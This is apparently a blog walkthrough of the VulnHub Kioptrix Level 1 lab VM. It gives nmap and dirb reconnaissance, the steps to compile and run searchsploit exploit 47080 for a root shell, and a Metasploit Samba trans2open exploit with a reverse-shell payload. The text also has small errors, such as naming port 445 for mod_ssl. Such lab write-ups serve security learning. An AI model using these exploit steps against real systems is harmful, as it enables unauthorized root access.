kioptrix level 1 walkthrough

kioptrix level 1 walkthrough Vulnhub | kioptrix level 1 Writeup Vulnhub

In this article, we are solving another vulnhub CTF Challenge kioptrix level 1 this VM is create by kioptrix you can download here this VM link

kioptrix level 1 Description

This Kioptrix VM Image is easy to challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

Network Scanning

First we scanning our local network with nmap ping scan

nmap -sn 172.20.10.1-255
kioptrix level 1 walkthrough Vulnhub | kioptrix level 1 Writeup Vulnhub

Now we have a target IP address our next step is scanning all ports and running services using nmap aggressive scan

nmap -A 172.20.10.4
kioptrix level 1 walkthrough Vulnhub | kioptrix level 1 Writeup Vulnhub

our nmap scanning is complete and we see the nmap output many ports are open 22 SSH, 80HTTP, 111 rpcbind, 139SMB, and 443 SSL HTTPS

Enumeration

Every time first we open the target IP our browser and we see apache default page after enumeration the port 80 I didn’t find any useful

http://172.20.10.4

Now we enumerated the directories with directory buster using the command

dirb http://172.20.10.4
kioptrix level 1 walkthrough Vulnhub | kioptrix level 1 Writeup Vulnhub

As a result, we found many directory, i explore the all URL but there no useful

we already see the port 445 is open and running service version is mod_ssl/2.8.4 I search the exploit from searchsploit

searchsploit mod_ssl

and here I found a remote buffer overflow exploit and I copy the payload current working directory using the command

searchsploit -m 47080

After copy the payload now we compile our payload c file to binary executable file using the GCC command and adding executing permission

gcc -o hackNos 47080.c -lcrypto
chmod +x hackNos

our exploit is ready to use now run the command using argument 0x6b buffer and our target ip address

./hackNos 0x6b 172.20.10.4 -c 41

and we have a root shell target machine we identified the current user and group using id command

id
kioptrix level 1 walkthrough Vulnhub | kioptrix level 1 Writeup Vulnhub

kioptrix level 1 walkthrough samba

This vm two way to exploit and get root access we move second way to exploit root access the CTF

I load our msfconsole and using the Metasploit auxiliary scanner we find the current running version of smb

msfdb run
use auxiliary/scanner/smb/smb_version
set rhosts 172.20.10.4
run
kioptrix level 1 walkthrough Vulnhub | kioptrix level 1 Writeup Vulnhub

I search on google and i find a exploit samba 2.2.1a trans2open remove buffer overflow

Description the exploit

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set.

again run the msfconsole and load the exploit Linux samba trans2open and setup our remote host IP address

msfdb run
use exploit/linux/samba/trans2open
set rhost 172.20.10.4
set pay linux/x86/shell_reverse_tcp
set lhost wlan0
set lport 4545
run

After run the exploit new session is open and we see a blank shell again identified our current shell

kioptrix level 1 walkthrough Vulnhub | kioptrix level 1 Writeup Vulnhub
It’s October Vulnhub Walkthrough read link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →